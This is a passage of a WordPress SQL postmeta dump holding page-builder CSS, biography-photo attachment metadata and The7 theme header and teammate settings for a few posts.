!important;}.vc_custom_1668021165897{padding-top: 40px !important;}.vc_custom_1685735404108{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1668005438919{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668010702427{margin-top: 35px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668204801057{margin-top: 1px !important;border-top-width: 0px !important;padding-top: 0px !important;}.vc_custom_1668204929553{margin-top: 20px !important;}.vc_custom_1685153474011{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1685153388835{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}'),
(33121,4628,'_wpb_shortcodes_custom_css','.vc_custom_1680403823446{margin-top: -35px !important;}.vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668018620108{padding-top: 100px !important;padding-bottom: 105px !important;}.vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}.vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}.vc_custom_1680403783341{margin-top: -15px !important;}.vc_custom_1680403868499{margin-top: -35px !important;}.vc_custom_1680403868499{margin-top: -35px !important;}.vc_custom_1680403868499{margin-top: -35px !important;}.vc_custom_1684202742439{margin-top: 50px !important;}.vc_custom_1685609158984{margin-top: 100px !important;}.vc_custom_1685609109195{margin-top: 0px !important;}.vc_custom_1681406603694{margin-top: 125px !important;}.vc_custom_1681406565735{margin-top: 50px !important;}.vc_custom_1681406679677{margin-top: 137px !important;}.vc_custom_1684969898333{margin-top: 5px !important;}.vc_custom_1684305185157{margin-top: 40px !important;}.vc_custom_1684969841504{margin-top: 20px !important;}.vc_custom_1685609238799{margin-top: 50px !important;}.vc_custom_1681676234291{margin-top: 50px !important;}.vc_custom_1681406965583{margin-top: 50px !important;}.vc_custom_1681406157694{margin-top: 88px !important;}.vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1675475943417{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}.vc_custom_1684377464605{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}.vc_custom_1685736118080{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1685791591251{margin-top: 260px !important;}.vc_custom_1685791357227{margin-top: 220px !important;}.vc_custom_1685791546373{margin-top: 220px !important;}.vc_custom_1684379817578{margin-left: -50px !important;border-left-width: -50px !important;}.vc_custom_1684379884193{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: -50px !important;}.vc_custom_1684378842229{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1675473187232{border-top-width: 25px !important;padding-top: 25px !important;}.vc_custom_1668021047643{margin-top: 25px !important;}.vc_custom_1681902149314{margin-top: -25px !important;}.vc_custom_1668021165897{padding-top: 40px !important;}.vc_custom_1685735404108{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1668005438919{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668010702427{margin-top: 35px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668204801057{margin-top: 1px !important;border-top-width: 0px !important;padding-top: 0px !important;}.vc_custom_1668204929553{margin-top: 20px !important;}.vc_custom_1685153474011{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1685153388835{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}'),
(33122,4629,'_edit_lock','1685794078:1'),
(33123,4630,'_wp_attached_file','2023/06/Aliaa-Bio-2.jpg'),
(33124,4630,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:465;s:6:\"height\";i:556;s:4:\"file\";s:23:\"2023/06/Aliaa-Bio-2.jpg\";s:8:\"filesize\";i:118603;s:5:\"sizes\";a:2:{s:6:\"medium\";a:5:{s:4:\"file\";s:23:\"Aliaa-Bio-2-251x300.jpg\";s:5:\"width\";i:251;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:11516;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:23:\"Aliaa-Bio-2-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:4905;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:11:\"Aliaa Bio 2\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(33125,4629,'_thumbnail_id','4630'),
(33126,4629,'_edit_last','1'),
(33127,4629,'_dt_sidebar_position','disabled'),
(33128,4629,'_dt_sidebar_widgetarea_id','sidebar_1'),
(33129,4629,'_dt_sidebar_hide_on_mobile','0'),
(33130,4629,'_dt_footer_show','1'),
(33131,4629,'_dt_footer_widgetarea_id','sidebar_2'),
(33132,4629,'_dt_footer_hide_on_mobile','0'),
(33133,4629,'_dt_header_title','fancy'),
(33134,4629,'_dt_header_background','normal'),
(33135,4629,'_dt_header_background_below_slideshow','disabled'),
(33136,4629,'_dt_header_transparent_bg_color_scheme','light'),
(33137,4629,'_dt_header_transparent_top_bar_bg_color','#ffffff'),
(33138,4629,'_dt_header_transparent_top_bar_bg_opacity','25'),
(33139,4629,'_dt_header_transparent_bg_color','#000000'),
(33140,4629,'_dt_header_transparent_bg_opacity','50'),
(33141,4629,'_dt_header_disabled_background','normal'),
(33142,4629,'_dt_header_disabled_transparent_bg_color_scheme','light'),
(33143,4629,'_dt_header_disabled_transparent_top_bar_bg_color','#ffffff'),
(33144,4629,'_dt_header_disabled_transparent_top_bar_bg_opacity','25'),
(33145,4629,'_dt_header_disabled_transparent_bg_color','#000000'),
(33146,4629,'_dt_header_disabled_transparent_bg_opacity','50'),
(33147,4629,'_dt_page_overrides_top_margin',''),
(33148,4629,'_dt_page_overrides_right_margin',''),
(33149,4629,'_dt_page_overrides_bottom_margin',''),
(33150,4629,'_dt_page_overrides_left_margin',''),
(33151,4629,'_dt_mobile_page_padding_top',''),
(33152,4629,'_dt_mobile_page_padding_right',''),
(33153,4629,'_dt_mobile_page_padding_bottom',''),
(33154,4629,'_dt_mobile_page_padding_left',''),
(33155,4629,'_dt_fancy_header_layout_heading',''),
(33156,4629,'_dt_fancy_header_title_aligment','center'),
(33157,4629,'_dt_fancy_header_height','300'),
(33158,4629,'_dt_fancy_header_padding-top','0px'),
(33159,4629,'_dt_fancy_header_padding-bottom','0px'),
(33160,4629,'_dt_fancy_header_breadcrumbs_heading',''),
(33161,4629,'_dt_fancy_header_breadcrumbs','disabled'),
(33162,4629,'_dt_fancy_header_breadcrumbs_text_color','#ffffff'),
(33163,4629,'_dt_fancy_header_breadcrumbs_bg_color','disabled'),
(33164,4629,'_dt_fancy_header_title_heading',''),
(33165,4629,'_dt_fancy_header_title_mode','generic'),
(33166,4629,'_dt_fancy_header_title',''),
(33167,4629,'_dt_fancy_header_title_font_size','30'),
(33168,4629,'_dt_fancy_header_title_line_height','36'),
(33169,4629,'_dt_fancy_header_text_transform','none'),
(33170,4629,'_dt_fancy_header_title_color_mode','color'),
(33171,4629,'_dt_fancy_header_title_color','#ffffff'),
(33172,4629,'_dt_fancy_header_subtitle_heading',''),
(33173,4629,'_dt_fancy_header_subtitle',''),
(33174,4629,'_dt_fancy_header_subtitle_font_size','18'),
(33175,4629,'_dt_fancy_header_subtitle_line_height','26'),
(33176,4629,'_dt_fancy_header_subtitle_text_transform','none'),
(33177,4629,'_dt_fancy_header_subtitle_color_mode','color'),
(33178,4629,'_dt_fancy_header_subtitle_color','#ffffff'),
(33179,4629,'_dt_fancy_header_bg_heading',''),
(33180,4629,'_dt_fancy_header_bg_color','#222222'),
(33181,4629,'_dt_fancy_header_bg_image_origin','custom'),
(33182,4629,'_dt_fancy_header_bg_image','a:0:{}'),
(33183,4629,'_dt_fancy_header_bg_repeat','no-repeat'),
(33184,4629,'_dt_fancy_header_bg_position_x','center'),
(33185,4629,'_dt_fancy_header_bg_position_y','center'),
(33186,4629,'_dt_fancy_header_bg_fullscreen','1'),
(33187,4629,'_dt_fancy_header_bg_overlay','0'),
(33188,4629,'_dt_fancy_header_overlay_color','#000'),
(33189,4629,'_dt_fancy_header_bg_overlay_opacity','50'),
(33190,4629,'_dt_fancy_header_scroll_effect','default'),
(33191,4629,'_dt_fancy_header_bg_parallax','0.5'),
(33192,4629,'_dt_fancy_header_responsiveness_heading',''),
(33193,4629,'_dt_fancy_header_responsiveness','disabled'),
(33194,4629,'_dt_fancy_header_responsiveness_switch','778px'),
(33195,4629,'_dt_fancy_header_responsive_height','70'),
(33196,4629,'_dt_fancy_header_responsive_font_size','30'),
(33197,4629,'_dt_fancy_header_responsive_title_line_height','38'),
(33198,4629,'_dt_fancy_header_responsive_subtitle_font_size','20'),
(33199,4629,'_dt_fancy_header_responsive_subtitle_line_height','28'),
(33200,4629,'_dt_fancy_header_responsive_breadcrumbs','disabled'),
(33201,4629,'_dt_teammate_options_go_to_single','1'),
(33202,4629,'_dt_teammate_options_position',''),
(33203,4629,'_dt_teammate_options_website',''),
(33204,4629,'_dt_teammate_options_mail',''),
(33205,4629,'_dt_teammate_options_facebook',''),
(33206,4629,'_dt_teammate_options_twitter',''),
(33207,4629,'_dt_teammate_options_dribbble',''),
(33208,4629,'_dt_teammate_options_you-tube',''),
(33209,4629,'_dt_teammate_options_rss',''),
(33210,4629,'_dt_teammate_options_delicious',''),
(33211,4629,'_dt_teammate_options_flickr',''),
(33212,4629,'_dt_teammate_options_lastfm',''),
(33213,4629,'_dt_teammate_options_linkedin',''),
(33214,4629,'_dt_teammate_options_vimeo',''),
(33215,4629,'_dt_teammate_options_tumbler',''),
(33216,4629,'_dt_teammate_options_pinterest',''),
(33217,4629,'_dt_teammate_options_devian',''),
(33218,4629,'_dt_teammate_options_skype',''),
(33219,4629,'_dt_teammate_options_github',''),
(33220,4629,'_dt_teammate_options_instagram',''),
(33221,4629,'_dt_teammate_options_stumbleupon',''),
(33222,4629,'_dt_teammate_options_behance',''),
(33223,4629,'_dt_teammate_options_px-500',''),
(33224,4629,'_dt_teammate_options_tripedvisor',''),
(33225,4629,'_dt_teammate_options_vk',''),
(33226,4629,'_dt_teammate_options_foursquare',''),
(33227,4629,'_dt_teammate_options_xing',''),
(33228,4629,'_dt_teammate_options_weibo',''),
(33229,4629,'_dt_teammate_options_odnoklassniki',''),
(33230,4629,'_dt_teammate_options_research-gate',''),
(33231,4629,'_dt_teammate_options_yelp',''),
(33232,4629,'_dt_teammate_options_blogger',''),
(33233,4629,'_dt_teammate_options_soundcloud',''),
(33234,4629,'_dt_teammate_options_viber',''),
(33235,4629,'_dt_teammate_options_whatsapp',''),
(33236,4629,'_dt_teammate_options_reddit',''),
(33237,4629,'_dt_teammate_options_snapchat',''),
(33238,4629,'_dt_teammate_options_telegram',''),
(33239,4629,'the7_fancy_title_css','.fancy-header {\n  background-image: none;\n  background-repeat: no-repeat;\n  background-position: center center;\n  background-size: cover;\n  background-color: #222222;\n}\n.mobile-false .fancy-header {\n  background-attachment: scroll;\n}\n.fancy-header .wf-wrap {\n  min-height: 300px;\n  padding-top: 0px;\n  padding-bottom: 0px;\n}\n.fancy-header .fancy-title {\n  font-size: 30px;\n  line-height: 36px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .fancy-subtitle {\n  font-size: 18px;\n  line-height: 26px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .breadcrumbs {\n  color: #ffffff;\n}\n.fancy-header-overlay {\n  background: rgba(0,0,0,0.5);\n}\n@media screen and (max-width: 778px) {\n  .fancy-header .wf-wrap {\n    min-height: 70px;\n  }\n  .fancy-header .fancy-title {\n    font-size: 30px;\n    line-height: 38px;\n  }\n  .fancy-header .fancy-subtitle {\n    font-size: 20px;\n    line-height: 28px;\n  }\n  .fancy-header.breadcrumbs-mobile-off .breadcrumbs {\n    display: none;\n  }\n  #fancy-header > .wf-wrap {\n    flex-flow: column wrap;\n    align-items: center;\n    justify-content: center;\n    padding-bottom: 0px !important;\n  }\n  .fancy-header.title-left .breadcrumbs {\n    text-align: center;\n    float: none;\n  }\n  .breadcrumbs {\n    margin-bottom: 10px;\n  }\n  .breadcrumbs.breadcrumbs-bg {\n    margin-top: 10px;\n  }\n  .fancy-header.title-right .breadcrumbs {\n    margin: 10px 0 10px 0;\n  }\n  #fancy-header .hgroup,\n  #fancy-header .breadcrumbs {\n    text-align: center;\n  }\n  .fancy-header .hgroup {\n    padding-bottom: 5px;\n  }\n  .breadcrumbs-off .hgroup {\n    padding-bottom: 5px;\n  }\n  .title-right .hgroup {\n    padding: 0 0 5px 0;\n  }\n  .title-right.breadcrumbs-off .hgroup {\n    padding-top: 5px;\n  }\n  .title-left.disabled-bg .breadcrumbs {\n    margin-bottom: 0;\n  }\n}\n'),
(33240,4631,'_edit_lock','1685793820:1'),
(33241,4632,'_wp_attached_file','2023/06/Ali-Amasha-Biography_n41.jpg'),
(33242,4632,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:302;s:6:\"height\";i:387;s:4:\"file\";s:36:\"2023/06/Ali-Amasha-Biography_n41.jpg\";s:8:\"filesize\";i:71637;s:5:\"sizes\";a:2:{s:6:\"medium\";a:5:{s:4:\"file\";s:36:\"Ali-Amasha-Biography_n41-234x300.jpg\";s:5:\"width\";i:234;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:10792;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:36:\"Ali-Amasha-Biography_n41-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:5103;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:10:\"Ali Amasha\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(33243,4631,'_thumbnail_id','4632'),
(33244,4631,'_edit_last','1'),
(33245,4631,'_dt_sidebar_position','disabled'),
(33246,4631,'_dt_sidebar_widgetarea_id','sidebar_1'),
(33247,4631,'_dt_sidebar_hide_on_mobile','0'),
(33248,4631,'_dt_footer_show','1'),
(33249,4631,'_dt_footer_widgetarea_id','sidebar_2'),
(33250,4631,'_dt_footer_hide_on_mobile','0'),
(33251,4631,'_dt_header_title','fancy'),
(33252,4631,'_dt_header_background','normal'),
(33253,4631,'_dt_header_background_below_slideshow','disabled'),
(33254,4631,'_dt_header_transparent_bg_color_scheme','light'),
(33255,4631,'_dt_header_transparent_top_bar_bg_color','#ffffff'),
(33256,4631,'_dt_header_transparent_top_bar_bg_opacity','25'),
(33257,4631,'_dt_header_transparent_bg_color','#000000'),
(33258,4631,'_dt_header_transparent_bg_opacity','50'),
(33259,4631,'_dt_header_disabled_background','normal'),
(33260,4631,'_dt_header_disabled_transparent_bg_color_scheme','light'),
(33261,4631,'_dt_header_disabled_transparent_top_bar_bg_color','#ffffff'),
(33262,4631,'_dt_header_disabled_transparent_top_bar_bg_opacity','25'),
(33263,4631,'_dt_header_disabled_transparent_bg_color','#000000'),
(33264,4631,'_dt_header_disabled_transparent_bg_opacity','50'),
(33265,4631,'_dt_page_overrides_top_margin',''),
(33266,4631,'_dt_page_overrides_right_margin',''),
(33267,4631,'_dt_page_overrides_bottom_margin',''),
(33268,4631,'_dt_page_overrides_left_margin',''),
(33269,4631,'_dt_mobile_page_padding_top',''),
(33270,4631,'_dt_mobile_page_padding_right',''),
(33271,4631,'_dt_mobile_page_padding_bottom',''),
(33272,4631,'_dt_mobile_page_padding_left',''),
(33273,4631,'_dt_fancy_header_layout_heading',''),
(33274,4631,'_dt_fancy_header_title_aligment','center'),
(33275,4631,'_dt_fancy_header_height','300'),
(33276,4631,'_dt_fancy_header_padding-top','0px'),
(33277,4631,'_dt_fancy_header_padding-bottom','0px'),
(33278,4631,'_dt_fancy_header_breadcrumbs_heading',''),
(33279,4631,'_dt_fancy_header_breadcrumbs','disabled'),
(33280,4631,'_dt_fancy_header_breadcrumbs_text_color','#ffffff'),
(33281,4631,'_dt_fancy_header_breadcrumbs_bg_color','disabled'),
(33282,4631,'_dt_fancy_header_title_heading',''),
(33283,4631,'_dt_fancy_header_title_mode','generic'),
(33284,4631,'_dt_fancy_header_title',''),
(33285,4631,'_dt_fancy_header_title_font_size','30'),
(33286,4631,'_dt_fancy_header_title_line_height','36'),
(33287,4631,'_dt_fancy_header_text_transform','none'),
(33288,4631,'_dt_fancy_header_title_color_mode','color'),
(33289,4631,'_dt_fancy_header_title_color','#ffffff'),
(33290,4631,'_dt_fancy_header_subtitle_heading',''),
(33291,4631,'_dt_fancy_header_subtitle',''),
(33292,4631,'_dt_fancy_header_subtitle_font_size','18'),
(33293,4631,'_dt_fancy_header_subtitle_line_height','26'),
(33294,4631,'_dt_fancy_header_subtitle_text_transform','none'),
(33295,4631,'_dt_fancy_header_subtitle_color_mode','color'),
(33296,4631,'_dt_fancy_header_subtitle_color','#ffffff'),
(33297,4631,'_dt_fancy_header_bg_heading',''),
(33298,4631,'_dt_fancy_header_bg_color','#222222'),
(33299,4631,'_dt_fancy_header_bg_image_origin','custom'),
(33300,4631,'_dt_fancy_header_bg_image','a:0:{}'),
(33301,4631,'_dt_fancy_header_bg_repeat','no-repeat'),
(33302,4631,'_dt_fancy_header_bg_position_x','center'),
(33303,4631,'_dt_fancy_header_bg_position_y','center'),
(33304,4631,'_dt_fancy_header_bg_fullscreen','1'),
(33305,4631,'_dt_fancy_header_bg_overlay','0'),
(33306,4631,'_dt_fancy_header_overlay_color','#000'),
(33307,4631,'_dt_fancy_header_bg_overlay_opacity','50'),
(33308,4631,'_dt_fancy_header_scroll_effect','default'),
(33309,4631,'_dt_fancy_header_bg_parallax','0.5'),
(33310,4631,'_dt_fancy_header_responsiveness_heading',''),
(33311,4631,'_dt_fancy_header_responsiveness','disabled'),
(33312,4631,'_dt_fancy_header_responsiveness_switch','778px'),
(33313,4631,'_dt_fancy_header_responsive_height','70'),
(33314,4631,'_dt_fancy_header_responsive_font_size','30'),
(33315,4631,'_dt_fancy_header_responsive_title_line_height','38'),
(33316,4631,'_dt_fancy_header_responsive_subtitle_font_size','20'),
(33317,4631,'_dt_fancy_header_responsive_subtitle_line_height','28'),
(33318,4631,'_dt_fancy_header_responsive_breadcrumbs','disabled'),
(33319,4631,'_dt_teammate_options_go_to_single','1'),
(33320,4631,'_dt_teammate_options_position',''),
(33321,4631,'_dt_teammate_options_website',''),
(33322,4631,'_dt_teammate_options_mail',''),
(33323,4631,'_dt_teammate_options_facebook',''),
(33324,4631,'_dt_teammate_options_twitter',''),
(33325,4631,'_dt_teammate_options_dribbble',''),
(33326,4631,'_dt_teammate_options_you-tube',''),
(33327,4631,'_dt_teammate_options_rss',''),
(33328,4631,'_dt_teammate_options_delicious',''),
(33329,4631,'_dt_teammate_options_flickr',''),
(33330,4631,'_dt_teammate_options_lastfm',''),
(33331,4631,'_dt_teammate_options_linkedin',''),
(33332,4631,'_dt_teammate_options_vimeo',''),
(33333,4631,'_dt_teammate_options_tumbler',''),
(33334,4631,'_dt_teammate_options_pinterest',''),
(33335,4631,'_dt_teammate_options_devian',''),
(33336,4631,'_dt_teammate_options_skype',''),
(33337,4631,'_dt_teammate_options_github',''),
(33338,4631,'_dt_teammate_options_instagram',''),
(33339,4631,'_dt_teammate_options_stumbleupon',''),
(33340,4631,'_dt_teammate_options_behance',''),
(33341,4631,'_dt_teammate_options_px-500',''),
(33342,4631,'_dt_teammate_options_tripedvisor',''),
(33343,4631,'_dt_teammate_options_vk',''),
(33344,4631,'_dt_teammate_options_foursquare',''),
(33345,4631,'_dt_teammate_options_xing',''),
(33346,4631,'_dt_teammate_options_weibo',''),
(33347,4631,'_dt_teammate_options_odnoklassniki',''),
(33348,4631,'_dt_teammate_options_research-gate',''),
(33349,4631,'_dt_teammate_options_yelp',''),
(33350,4631,'_dt_teammate_options_blogger',''),
(33351,4631,'_dt_teammate_options_soundcloud',''),
(33352,4631,'_dt_teammate_options_viber',''),
(33353,4631,'_dt_teammate_options_whatsapp',''),
(33354,4631,'_dt_teammate_options_reddit',''),
(33355,4631,'_dt_teammate_options_snapchat',''),
(33356,4631,'_dt_teammate_options_telegram',''),
(33357,4631,'the7_fancy_title_css','.fancy-header {\n  background-image: none;\n  background-repeat: no-repeat;\n  background-position: center center;\n  background-size: cover;\n  background-color: #222222;\n}\n.mobile-false .fancy-header {\n  background-attachment: scroll;\n}\n.fancy-header .wf-wrap {\n  min-height: 300px;\n  padding-top: 0px;\n  padding-bottom: 0px;\n}\n.fancy-header .fancy-title {\n  font-size: 30px;\n  line-height: 36px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .fancy-subtitle {\n  font-size: 18px;\n  line-height: 26px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .breadcrumbs {\n  color: #ffffff;\n}\n.fancy-header-overlay {\n  background: rgba(0,0,0,0.5);\n}\n@media screen and (max-width: 778px) {\n  .fancy-header .wf-wrap {\n    min-height: 70px;\n  }\n  .fancy-header .fancy-title {\n    font-size: 30px;\n    line-height: 38px;\n  }\n  .fancy-header .fancy-subtitle {\n    font-size: 20px;\n    line-height: 28px;\n  }\n  .fancy-header.breadcrumbs-mobile-off .breadcrumbs {\n    display: none;\n  }\n  #fancy-header > .wf-wrap {\n    flex-flow: column wrap;\n    align-items: center;\n    justify-content: center;\n    padding-bottom: 0px !important;\n  }\n  .fancy-header.title-left .breadcrumbs {\n    text-align: center;\n    float: none;\n  }\n  .breadcrumbs {\n    margin-bottom: 10px;\n  }\n  .breadcrumbs.breadcrumbs-bg {\n    margin-top: 10px;\n  }\n  .fancy-header.title-right .breadcrumbs {\n    margin: 10px 0 10px 0;\n  }\n  #fancy-header .hgroup,\n  #fancy-header .breadcrumbs {\n    text-align: center;\n  }\n  .fancy-header .hgroup {\n    padding-bottom: 5px;\n  }\n  .breadcrumbs-off .hgroup {\n    padding-bottom: 5px;\n  }\n  .title-right .hgroup {\n    padding: 0 0 5px 0;\n  }\n  .title-right.breadcrumbs-off .hgroup {\n    padding-top: 5px;\n  }\n  .title-left.disabled-bg .breadcrumbs {\n    margin-bottom: 0;\n  }\n}\n'),
(33358,4633,'_edit_lock','1685794026:1'),
(33359,4634,'_wp_attached_file','2023/06/as.jpg'),
(33360,4634,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:205;s:6:\"height\";i:280;s:4:\"file\";s:14:\"2023/06/as.jpg\";s:8:\"filesize\";i:42853;s:5:\"sizes\";a:1:{s:9:\"thumbnail\";a:5:{s:4:\"file\";s:14:\"as-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:3469;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(33361,4633,'_thumbnail_id','4634'),
(33362,4633,'_edit_last','1'),
(33363,4633,'_dt_sidebar_position','disabled'),
(33364,4633,'_dt_sidebar_widgetarea_id','sidebar_1'),
(33365,4633,'_dt_sidebar_hide_on_mobile','0'),
(33366,4633,'_dt_footer_show','1'),
(33367,4633,'_dt_footer_widgetarea_id','sidebar_2'),
(33368,4633,'_dt_footer_hide_on_mobile','0'),
(33369,4633,'_dt_header_title','fancy'),
(33370,4633,'_dt_header_background','normal'),
(33371,4633,'_dt_header_background_below_slideshow','disabled'),
(33372,4633,'_dt_header_transparent_bg_color_scheme','light'),
(33373,4633,'_dt_header_transparent_top_bar_bg_color','#ffffff'),
(33374,4633,'_dt_header_transparent_top_bar_bg_opacity','25'),
(33375,4633,'_dt_header_transparent_bg_color','#000000'),
(33376,4633,'_dt_header_transparent_bg_opacity','50'),
(33377,4633,'_dt_header_disabled_background','normal'),
(33378,4633,'_dt_header_disabled_transparent_bg_color_scheme','light'),
(33379,4633,'_dt_header_disabled_transparent_top_bar_bg_color','#ffffff'),
(33380,4633,'_dt_header_disabled_transparent_top_bar_bg_opacity','25'),
(33381,4633,'_dt_header_disabled_transparent_bg_color','#000000'),
(33382,4633,'_dt_header_disabled_transparent_bg_opacity','50'),
(33383,4633,'_dt_page_overrides_top_margin',''),
(33384,4633,'_dt_page_overrides_right_margin',''),
(33385,4633,'_dt_page_overrides_bottom_margin',''),
(33386,4633,'_dt_page_overrides_left_margin',''),
(33387,4633,'_dt_mobile_page_padding_top',''),
(33388,4633,'_dt_mobile_page_padding_right',''),
(33389,4633,'_dt_mobile_page_padding_bottom',''),
(33390,4633,'_dt_mobile_page_padding_left',''),
(33391,4633,'_dt_fancy_header_layout_heading',''),
(33392,4633,'_dt_fancy_header_title_aligment','center'),
(33393,4633,'_dt_fancy_header_height','300'),
(33394,4633,'_dt_fancy_header_padding-top','0px'),
(33395,4633,'_dt_fancy_header_padding-bottom','0px'),
(33396,4633,'_dt_fancy_header_breadcrumbs_heading',''),
(33397,4633,'_dt_fancy_header_breadcrumbs','disabled'),
(33398,4633,'_dt_fancy_header_breadcrumbs_text_color','#ffffff'),
(33399,4633,'_dt_fancy_header_breadcrumbs_bg_color','disabled'),
(33400,4633,'_dt_fancy_header_title_heading',''),
(33401,4633,'_dt_fancy_header_title_mode','generic'),
(33402,4633,'_dt_fancy_header_title',''),
(33403,4633,'_dt_fancy_header_title_font_size','30'),
(33404,4633,'_dt_fancy_header_title_line_height','36'),
(33405,4633,'_dt_fancy_header_text_transform','none'),
(33406,4633,'_dt_fancy_header_title_color_mode','color'),
(33407,4633,'_dt_fancy_header_title_color','#ffffff'),
(33408,4633,'_dt_fancy_header_subtitle_heading',''),
(33409,4633,'_dt_fancy_header_subtitle',''),
(33410,4633,'_dt_fancy_header_subtitle_font_size','18'),
(33411,4633,'_dt_fancy_header_subtitle_line_height','26'),
(33412,4633,'_dt_fancy_header_subtitle_text_transform','none'),
(33413,4633,'_dt_fancy_header_subtitle_color_mode','color'),
(33414,4633,'_dt_fancy_header_subtitle_color','#ffffff'),
(33415,4633,'_dt_fancy_header_bg_heading',''),
(33416,4633,'_dt_fancy_header_bg_color','#222222'),
(33417,4633,'_dt_fancy_header_bg_image_origin','custom'),
(33418,4633,'_dt_fancy_header_bg_image','a:0:{}'),
(33419,4633,'_dt_fancy_header_bg_repeat','no-repeat'),
(33420,4633,'_dt_fancy_header_bg_position_x','center'),
(33421,4633,'_dt_fancy_header_bg_position_y','center'),
(33422,4633,'_dt_fancy_header_bg_fullscreen','1'),
(33423,4633,'_dt_fancy_header_bg_overlay','0'),
(33424,4633,'_dt_fancy_header_overlay_color','#000'),
(33425,4633,'_dt_fancy_header_bg_overlay_opacity','50'),
(33426,4633,'_dt_fancy_header_scroll_effect','default'),
(33427,4633,'_dt_fancy_header_bg_parallax','0.5'),
(33428,4633,'_dt_fancy_header_responsiveness_heading',''),
(33429,4633,'_dt_fancy_header_responsiveness','disabled'),
(33430,4633,'_dt_fancy_header_responsiveness_switch','778px'),
(33431,4633,'_dt_fancy_header_responsive_height','70'),
(33432,4633,'_dt_fancy_header_responsive_font_size','30'),
(33433,4633,'_dt_fancy_header_responsive_title_line_height','38'),
(33434,4633,'_dt_fancy_header_responsive_subtitle_font_size','20'),
(33435,4633,'_dt_fancy_header_responsive_subtitle_line_height','28'),
(33436,4633,'_dt_fancy_header_responsive_breadcrumbs','disabled'),
(33437,4633,'_dt_teammate_options_go_to_single','1'),
(33438,4633,'_dt_teammate_options_position',''),
